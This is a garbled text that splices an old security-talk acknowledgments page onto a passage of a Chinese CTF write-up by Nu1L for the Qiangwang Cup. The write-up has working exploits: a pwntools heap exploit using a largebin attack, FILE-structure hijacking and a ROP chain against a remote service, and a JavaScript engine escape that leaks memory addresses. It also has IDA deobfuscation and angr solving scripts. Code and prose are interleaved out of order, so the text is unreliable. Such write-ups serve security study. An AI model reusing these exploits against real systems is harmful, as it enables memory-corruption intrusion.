implementation.” - aRgus Chung 2003 “The west side is the best side.” - d4yj4y Chung 2003 “Live and learn; no one is above making mistakes.” - sMURFBOy Chung 2003 To The Moon! the Luna way Forward Pointers • Government IP_TAPPING by Jaya Baloo Today @ 5:00-5:50 • Airsnarf by Beetle & Bruce Potter Tomorrow @ 2:00-2:50 • Technical Security Countermeasures by Jeffrey Prusan Sunday @ 2:00-2:50 • The moon bounce team. Saqib @ SystemV • The infamous Mr. Tang for the genius mathematical guidance • Douglas Adams and the meaning of life: 42; R.I.P • YOU for the support--thank you very much Rosco’s for the chicken and waffles Acknowledgments Live Demo Q & A
强⽹杯 WriteUp By Nu1L Author:Nu1L Team 强⽹杯 WriteUp By Nu1L Pwn yakagame easychain1 house of cat Reverse find_basic easyre deeprev GameMaster easyapk Web uploadpro babyweb easylogin easyweb crash Crypto Factor myJWT Lattice Misc 谍影重重 强⽹先锋 rcefile polydiv devnull WP-UM AVR Pwn yakagame llvm void a000(int a); void a001(int a); void a002(int a); void a003(int a); void a004(int a); void a005(int a); void a006(int a); void a007(int a); void a008(int a); void a009(int a); void a010(int a); void a011(int a); void a012(int a); void a013(int a); void a014(int a); void a015(int a); void a016(int a); void a017(int a); void a018(int a); void a019(int a); void a020(int a); void a021(int a); void a022(int a); void a023(int a); void a024(int a); void a025(int a); void a026(int a); void a027(int a); void a028(int a); void a029(int a); void a030(int a); void a031(int a); void a032(int a); void a033(int a); void a034(int a); void a035(int a); void a036(int a); void a037(int a); void a038(int a); void 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a); void a206(int a); void a207(int a); void a208(int a); void a209(int a); void a210(int a); void a211(int a); void a212(int a); void a213(int a); void a214(int a); void a215(int a); void a216(int a); void a217(int a); void a218(int a); void a219(int a); void a220(int a); void a221(int a); void a222(int a); void a223(int a); void a224(int a); void a225(int a); void a226(int a); void a227(int a); void a228(int a); void a229(int a); void a230(int a); void a231(int a); void a232(int a); void a233(int a); void a234(int a); void a235(int a); void a236(int a); void a237(int a); void a238(int a); void a239(int a); void a240(int a); void a241(int a); void a242(int a); void a243(int a); void a244(int a); void a245(int a); void a246(int a); void a247(int a); void a248(int a); void a249(int a); void a250(int a); void a251(int a); void a252(int a); void a253(int a); void a254(int a); void a255(int a); void fight(int a); void merge(int a,int b); void destroy(int a); void upgrade(int a); void wuxiangdeyidao(); void zhanjinniuza(); void guobapenhuo(); void tiandongwanxiang(); void gamestart(){    a000(0xf0);    a001(0);    a002(0);    a003(0);    a004(0);    a005(0);    a006(0);    a007(0);    a008(0);    a009(0);    a010(0);    a011(0);    a012(0);    a013(0);    a014(0);    a015(0);    a016(0);    a017(0);    a018(0);    a019(0);    a020(0);    a021(0);    a022(0);    a023(0);    a024(0);    a025(0);    a026(0);    a027(0);    a028(0);    a029(0);    a030(0);    a031(0);    a032(0);    a033(0);    a034(0);    a035(0);    a036(0);    a037(0);    a038(0);    a039(0);    a040(0);    a041(0);    a042(0);    a043(0);    a044(0);    a045(0);    a046(0);    a047(0);    a048(0);    a049(0);    a050(0);    a051(0);    a052(0);    a053(0);    a054(0);    a055(0);    a056(0);    a057(0);    a058(0);    a059(0);    a060(0);    a061(0);    a062(0);    a063(0);    a064(0);    a065(0);    a066(0);    a067(0);    a068(0);    a069(0);    a070(0);    a071(0);    a072(0);    a073(0);    a074(0);    a075(0);    a076(0);    a077(0);    a078(0);    a079(0);    a080(0);    a081(0);    a082(0);    a083(0);    a084(0);    a085(0);    a086(0);    a087(0);    a088(0);    a089(0);    a090(0);    a091(0);    a092(0);    a093(0);    a094(0);    a095(0);    a096(0);    a097(0);    a098(0);    a099(0);    a100(0);    a101(0);    a102(0);    a103(0);    a104(0);    a105(0);    a106(0);    a107(0);    a108(0);    a109(0);    a110(0);    a111(0);    a112(0);    a113(0);    a114(0);    a115(0);    a116(0);    a117(0);    a118(0);    a119(0);    a120(0);    a121(0);    a122(0);    a123(0);    a124(0);    a125(0);    a126(0);    a127(0);    a128(0);    a129(0);    a130(0);    a131(0);    a132(0);    a133(0);    a134(0);    a135(0);    a136(0);    a137(0);    a138(0);    a139(0);    a140(0);    a141(0);    a142(0);    a143(0);    a144(0);    a145(0);    a146(0);    a147(0);    a148(0);    a149(0);    a150(0);    a151(0);    a152(0);    a153(0);    a154(0);    a155(0);    a156(0);    a157(0);    a158(0);    a159(0);    a160(0);    a161(0);    a162(0);    a163(0);    a164(0);    a165(0);    a166(0);    a167(0);    a168(0);    a169(0);    a170(0);    a171(0);    a172(0);    a173(0);    a174(0);    a175(0);    a176(0);    a177(0);    a178(0);    a179(0);    a180(0);    a181(0);    a182(0);    a183(0);    a184(0);    a185(0);    a186(0);    a187(0xff);    a188(0);    a189(0);    a190(0);    a191(0);    a192(0);    a193(0);    a194(0);    a195(0);    a196(0);    a197(0);    a198(0);    a199(0);    a200(0);    a201(0);    a202(0);    a203(0);    a204(0);    a205(0);    a206(0);    a207(0);    a208(0);    a209(0);    a210(0);    a211(0);    a212(0);    a213(0);    a214(0);    a215(0);    a216(0);    a217(0);    a218(0);    a219(0);    a220(0);    a221(0);    a222(0);    a223(0);    a224(0);    a225(0);    a226(0);    a227(0);    a228(0);    a229(0);    a230(0);    a231(0);    a232(0xad);    a233(0xfd);    a234(0x6e);    a235(0);    a236(0);    a237(0);    a238(0);    a239(0);    a240(0x30);    a241(0);    a242(0);    a243(0);    a244(0);    a245(0);    a246(0);    a247(0);    a248(0);    a249(0);    a250(0);    a251(0);    a252(0);    a253(0);    a254(0);    a255(0);    a232(0xad);    a233(0xfd);    a234(0x6e);    a235(0);    a236(0);    a237(0);    a238(0);    a239(0);    a187(0xff);    a240(0x30);    fight(0); } easychain1 jerry的js逃逸题 house of cat 2.35 Largebin Attack ? ubuntu 22.04 第⼀步:LOGIN |NAME r00t QWBQWXF admin 第⼆步:CAT |NAME r00t QWBQWXF \xFF$ 有个UAF 需要触发⼀个IO或者exit来劫持控制流 var tmpArray=new Array(0x100-0x7);var i=0;for(i=0;i<0x100-0x7;i++) {tmpArray.push(0xdeadbeef)}var piebase=0x41414141,libcbase=0x41414141,stackbase=0x41414141;var a;var data1;var data2;var buffer1;var buffer2;a=[0x41414141];buffer1=new ArrayBuffer(0x10);data1=new DataView(buffer1);buffer2=new ArrayBuffer(0x300);data2=new DataView(buffer2);a.pop();data1.setUint32(0,0x41414141,true);data2.setUint32(0,0x414141 41,true);a[49]=0x3000;piebase=data1.getUint32(0x58+4,true)*0x100000000+ ((data1.getUint32(0x58,true)-0xd1b38)&0xfffff000);print(piebase);data1.setUint32(0x78, (piebase+0xCDDD8)&0xffffffff,true);libcbase=data2.getUint32(4,true)*0x100000000+data2.g etUint32(0,true);libcbase=libcbase- 0x9a6d0;data1.setBigUint64(0x78,libcbase+0x229138,true);stackbase=data2.getUint32(4,tru e)*0x100000000+ (data2.getUint32(0,true))-0x108;print(stackbase);data1.setBigUint64(0x78,stackbase,true );data2.setBigUint64(0,libcbase+0x0000000000023b6a,true);data2.setBigUint64(8,libcbase+ 0x001b45bd,true);data2.setBigUint64(16,libcbase+0x0000000000023b6a+1,true);data2.setBig Uint64(24,libcbase+0x52290,true);data1.setBigUint64(0x78,libcbase+0x229138,true);eval(' 1234'); from pwn import * # s = process("./house_of_cat") s = remote("","34498") def run(payload):    s.recvuntil('~~~~~~')    s.sendline(payload) def cmd(choice):    run('CAT | r00tQWBAAAAA$\xff\xff\xff\xffQWXF')    s.recvuntil("choice:\n")    s.sendline(str(choice)) def add(idx,size,buf):    cmd(1)    s.sendlineafter("plz input your cat idx:",str(idx))    s.sendlineafter("plz input your cat size:",str(size))    s.sendafter("plz input your content:",buf) def free(idx):    cmd(2)    s.sendlineafter("plz input your cat idx:",str(idx)) def show(idx):    cmd(3)    s.sendlineafter("plz input your cat idx:",str(idx)) def edit(idx,buf):    cmd(4)    s.sendlineafter("plz input your cat idx:",str(idx))    s.sendafter("plz input your content:",buf) def ROL(content, key):    tmp = bin(content)[2:].rjust(64, '0')    return int(tmp[key:] + tmp[:key], 2) def enc(value,key):    return ROL(value^key,0x11) run("LOGIN | r00tQWBAAAAAadminQWXF") add(0,0x418,'A') add(1,0x418,'A') free(0) show(0) libc = ELF("./libc.so.6") libc.address = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00")-0x219ce0 success(hex(libc.address)) tls = libc.address - 0x28c0 success(hex(tls)) add(2,0x418,'A') add(3,0x420,'A') add(4,0x418,'A') free(3) add(5,0x430,'A') add(6,0x450,'A') add(7,0x430,'A') free(2) payload = p64(libc.address+0x21a0d0)*2+p64(0)+p64(tls+0x30-0x20) edit(3,payload) add(15,0x440,'A') show(3) s.recvuntil("Context:\n") heapbase = u64(s.recv(6)+"\x00\x00")-0x290 success(hex(heapbase)) key = heapbase+0x290 success(hex(key)) context.arch='amd64' gadget = 0x00000000001675b0+libc.address payload = FileStructure() payload._lock=libc.address+0x21ba70 #_IO_stdfile_1_lock io_cookie_jumps = libc.address+0x215b80 payload.vtable=io_cookie_jumps+8*7 #_IO_cookie_read->xsputn payload = str(payload)[0x10:] payload += p64(heapbase+0x2460+0x100)+p64(    enc(gadget,key)   ) payload = payload.ljust(0x100,'\x00') payload += 'A'*8+p64(heapbase+0x2460+0x100)+'A'*0x10+p64(libc.sym['setcontext']+61) pop_rdi = 0x000000000002a3e5+libc.address pop_rsi = 0x000000000002be51+libc.address pop_rdx_rbx = 0x0000000000090529 + libc.address pop_rax = 0x0000000000045eb0+libc.address syscall = 0x0000000000091396+libc.address sig = SigreturnFrame() sig.rsp = heapbase+0x2460+0x300 sig.rip = pop_rdi+1 payload += str(sig)[0x28:] payload = payload.ljust(0x300,'\x00') payload += p64(pop_rdi)+p64(0)+p64(libc.sym['close']) payload += p64(pop_rdi)+p64(heapbase+0x2460+0x400)+p64(pop_rsi)+p64(0)+p64(pop_rax)+p64(2)+p64(sys call) payload += p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(heapbase+0x500)+p64(pop_rdx_rbx)+p64(0x100)+p64(0) +p64(libc.sym['read']) payload += p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(heapbase+0x500)+p64(pop_rdx_rbx)+p64(0x100)+p64(0) +p64(libc.sym['write']) payload = payload.ljust(0x400)+'./flag\x00' add(8,0x440,payload)#stderr chunk add(9,0x430,'A') free(5) free(6) add(10,0x430+0x30,'A'*0x430+p64(0)+p64(0x461)) add(11,0x420,'A') #target free(6) add(12,0x450,'A'*0x20+p64(0)+p64(0x19c1)) free(6) add(13,0x460,'A') free(8) Reverse find_basic 混淆提取 free(11) payload = p64(libc.address+0x21a0e0)*2+p64(0)+p64(libc.sym['stderr']-0x20)+p64(0)+p64(0x301) edit(6,payload) # gdb.attach(s,'b _IO_cookie_read') # add(14,0x46f,'1') cmd(1) s.sendlineafter("plz input your cat idx:",str(14)) s.sendlineafter("plz input your cat size:",str(0x46f)) # free(0) s.interactive() import re import idautils import ida_funcs from pwn import * elf = ELF("./obf_xx_find") def disasm_filter(addr):    s = GetDisasm(addr)    if ';' in s:        s = s[0: s.find(";")]    return s.strip() def is_bound_block(addr):    keylist = ["pushf", "pusha", "call", "call", "popa", "popf", "push", "pushf", "call", "add", "popf", "jmp"]    first_insn = disasm_filter(addr)    if 'jmp' in first_insn:        addr = int(get_jmp_target(first_insn, ), 16)    for key in keylist:        insn = disasm_filter(addr)        addr = idc.next_head(addr)        if key not in insn:            return False    return True def is_obf_branch(addr):    keylist = ["pushf", "pusha", "fuck_sub1", "popa", "popf"]    for key in keylist:        insn = disasm_filter(addr)        addr = idc.next_head(addr)        if key not in insn:            return None    return get_jmp_target(disasm_filter(addr)) def is_start_block(start_ea, end_ea):    ea = start_ea    while ea < end_ea:        asm_text = disasm_filter(ea)        if 'cmp' in asm_text and 'l' in asm_text:            return True        ea = idc.next_head(ea)    return False def get_jmp_target(j, ea = 0):    if '$+' in j:        return hex(int(j.split('$+')[1], 10) + ea)[2:]    if 'sub_' in j:        return j.split('sub_')[1]    elif 'loc_' in j:        return j.split('loc_')[1]    elif 'unk_' in j:        return j.split('unk_')[1]    else:        print("invalid jmp instruction: %s" % j)        return None def is_subhanlder_start(addr):    keylist = ["cmp", "jnz", "popa", "popf"]    asm_text = disasm_filter(addr)    if ';' in asm_text:        asm_text = asm_text[0: asm_text.find(";")]    code = ''    if not ('cmp' in asm_text and 'l' in asm_text):        return None    code = asm_text    for key in keylist:        insn = disasm_filter(addr)        addr = idc.next_head(addr)        if key not in insn:            return None    if 'h' in code:        code = int(code.split(', ')[1].strip()[0: -1], 16)    else:        code = int(code.split(', ')[1].strip(), 16)    return code def parser_handler(ea):    real_insns = []    while True:        asm_text = disasm_filter(ea)        if ';' in asm_text:            asm_text = asm_text[0: asm_text.find(";")]        if asm_text[0] == 'j':            target = get_jmp_target(asm_text, ea)            if target != None:                if is_bound_block(int(target, 16)):                    return real_insns                if is_obf_branch(int(target, 16)):                    jmpname = asm_text.split(' ')[0]                    real_insns.append("%x: %s" % (ea, jmpname + ' loc_' + is_obf_branch(int(target, 16))))                    ea = idc.next_head(ea)                    continue        if 'call' in asm_text and 'sub_' in asm_text:            print(asm_text)            real_insns.append("call _%x" % get_real_caller(int(asm_text.split("sub_") [1], 16)))            ea = idc.next_head(ea)            continue        if 'retn' in asm_text:            real_insns = []        real_insns.append("%x: %s" % (ea, asm_text))        ea = idc.next_head(ea) def analysis_handler_range(start_ea, end_ea):    sub_handlers = {}    ea = start_ea    while ea < end_ea:        code = is_subhanlder_start(ea)        print("test %x" % ea)        if code != None:            print("start ea %x" % ea)            sub_handlers[code] = parser_handler(ea + 7)        ea = idc.next_head(ea)    return sub_handlers def is_call_handler(ea):    kl = ['pushf', "pusha", "mov", "call", "pop"]    cmd = ''    call_handler = ''    for k in kl:        asm = disasm_filter(ea)        if 'ds:(dword_8C000' in asm:            return None, None        if '[' in asm:            return None, None        if 'l,' in asm:            if 'h' in asm:                asm = asm.replace("h", "")            cmd = int(asm.split(', ')[1], 16)        if 'call' in asm:            if 'sub_' not in asm:                return None, None            call_handler = int(asm.split('sub_')[1], 16)        if k not in asm:            return None, None        ea = idc.next_head(ea)    return cmd, call_handler def get_real_caller(ea):    f = disasm_filter(ea)    if 'jmp' in f:        return int(get_jmp_target(f), 16)    return ea def fuck_func(ea, out_asm):    func = ida_funcs.get_func(ea)    ea = func.start_ea    out_asm.append("sub_%x:" % ea)    while ea < func.end_ea:        cmd, handler = is_call_handler(ea)        if cmd != None and handler != None:            if handler not in handler_map:                print("handler not found: %x", handler)            if cmd not in handler_map[handler]:                print("sub handler not found: %x, %x" % (handler, cmd))            out_asm.append("loc_%x:" % ea)            out_asm += handler_map[handler][cmd]            ea += 10        else:            asm = disasm_filter(ea)            out_asm.append("_%x: %s" % (ea, asm))            ea = idc.next_head(ea) def fuck_block(start, end, out_asm):    locs = scan_sym()    ea = start    while ea < end:        cmd, handler = is_call_handler(ea)        #if "_%x:" % ea in locs:        out_asm.append("%x:" % ea)        if cmd != None and handler != None:            if handler not in handler_map:                print("handler not found: %x", handler)            if cmd not in handler_map[handler]:                print("sub handler not found: %x, %x" % (handler, cmd))            out_asm += handler_map[handler][cmd]            ea += 10        else:            asm = disasm_filter(ea)            out_asm.append("%x: %s" % (ea, asm))            ea = idc.next_head(ea) def remove_unused(asm_out):    used = []    for i in range(len(asm_out)):        t = asm_out[i] # _46d0: jmp     short _46D7        if ('jmp' in t or 'call' in t ) and '_' in t and ': ' in t:            t = t.split(': ')[1]            if '_' in t:                t = t.split("_")[1]            used.append("_" + t.lower())    print(used)    for i in range(len(asm_out)):        t = asm_out[i]        if ':' in t:            addr = t[0: t.index(":")]            if addr.lower() not in used:                asm_out[i] = t[t.index(":") + 1: ] def process_list(out_asm):    for i in range(len(out_asm)):        out_asm[i] = out_asm[i].replace('loc_', "_")        out_asm[i] = out_asm[i].replace('loc_', "_")        out_asm[i] = out_asm[i].replace('short', "")        out_asm[i] = out_asm[i].replace('ptr', "")    for idx,i in enumerate(out_asm):        if 'getnextinsn_0' in i:            out_asm[idx] = 'call 0x435C'            out_asm[idx + 1] = "mov   eax, 0x8C000"        elif 'getnextinsn' in i:            out_asm[idx]  = 'call 0x900'            out_asm[idx + 1] = "mov   eax, 0x8C000"        if 'jmp     _' in i:            name = i.split('jmp     _')[1]            if name in elf.plt:                out_asm[idx] = "jmp 0x%x" % elf.plt[name]    rr = "\n".join(out_asm)    rr = re.sub("[0-9a-fA-F]+h", lambda f: "0x" + f.group()[:-1], rr)    rr = re.sub("_[A-F0-9]+", lambda f: f.group().lower(), rr)    print(rr) def scan_sym():    locs = []    for k in handler_map:        for c in handler_map[k]:            for asm_text in handler_map[k][c]:                r = re.search("_[A-Fa-f0-9]+[^f-zF-Z]", asm_text)                if r :                    locs.append(r.group())    return locs 对提取的代码重建后使⽤ angr 分析 ranges = [] handler_map = {} for ref in idautils.XrefsTo(0x47D6):    ranges.append(ref.frm - 3) ranges.append(0x5C59B) ranges = sorted(ranges) for idx, addr in enumerate(ranges):    if idx == len(ranges) - 1:        break    next_addr = ranges[idx + 1]    print("analysis: %x - %x" % (addr, next_addr))    handler_map[addr] = analysis_handler_range(addr, next_addr) print(handler_map) aaa = [] fuck_block(0x317B, 0x435C, aaa) fuck_block(0x4814, 0x61B7, aaa) fuck_block(0x750A9, 0x7CB31, aaa) fuck_block(0xA30, 0xA75, aaa) process_list(aaa) import angr import claripy base = 0x400000 proj = angr.Project("./hello") bvs = claripy.BVS("flag", 64 * 8) state = proj.factory.blank_state(addr=base + 0x11BC) state.memory.store(0xA00000, bvs) state.regs.ecx = 0xA00000 @proj.hook(base + 0x3276, length=0) def skip_check_equals_(state):    state.add_constraints(state.regs.eax == 0) simgr = proj.factory.simgr(state) found = simgr.explore(find=base+0x3275) state = found.found[0] print(state.regs.al) easyre 利⽤调试器上的解密算法修补好释放出来的真正可执⾏⽂件后,如果没检测到gdb,则会修正下⾯两个数组line和 col。百度了⼀下,这是⼀个叫数织的⼩游戏,25×25最快5分10秒。 state.add_constraints(state.regs.al == 1) print(state.solver.eval(bvs, cast_to=bytes)) unsigned char line[25][25] = { 0x06, 0x05, 0x01, 0x03, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x03, 0x01, 0x03, 0x01, 0x04, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01, 0x01, 0x01, 0x02, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x01, 0x04, 0x01, 0x03, 0x02, 0x01, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,// 0x06, 0x04,0x04, 0x04,0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01, 0x02, 0x02, 0x01, 0x02,0x01,0x02,0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01, 0x01,0x01, 0x01, 0x03, 0x04, 0x03,0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x01, 0x01, 0x01, 0x01, 0x01,0x01, 0x01, 0x01,0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x03, 0x01, 0x03, 0x01, 0x04, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x04,0x01,0x01, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x08,0x01, 0x01, 0x01,0x01,0x02, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01,0x01, 0x01,0x01, 0x01,0x01, 0x01,0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x02, 0x02, 0x01, 0x02, 0x01, 0x01,0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x02, 0x05,0x01, 0x01, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,// 0x06, 0x0C,0x02, 0x01,0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x02, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,0x01,0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x04, 0x07,0x02,0x01, 0x01,0x01,0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x01, 0x01, 0x02, 0x01,0x01, 0x01,0x01,0x01,0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x0C, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x04, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; unsigned char col[25][25] = { 0x05, 0x05, 0x05, 0x03, 0x01, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,//01 0x0A, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x01, 0x01, 0x05, 0x01, 0x03, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x01, 0x02,0x04,0x05, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x05,0x02, 0x01,0x01,0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x01,0x01,0x01,0x01, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,//06 0x05, 0x01,0x02, 0x06, 0x01, 0x03, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x02, 0x02,0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x02, 0x05,0x01,0x03, 0x01, 0x01, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x01, 0x01, 0x01, 0x01,0x01,0x01,   0x01, 0x03, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x02, 0x01,0x01,0x01, 0x01,0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,//11 0x04, 0x02, 0x05, 0x03, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x03, 0x05,0x01, 0x01, 0x01,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01, 0x01,0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01,0x01, 0x01, 0x03, 0x05, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 花了5个半⼩时拼出下⾯的图案。 0x06, 0x01, 0x03, 0x05,0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,//16 0x03, 0x01,0x01,0x03,0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x05,0x01,0x02,0x04,0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x01,0x04,0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x01, 0x01, 0x02, 0x04, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x05,0x04,0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,//21 0x04, 0x02,0x05,0x04, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x05,0x03, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 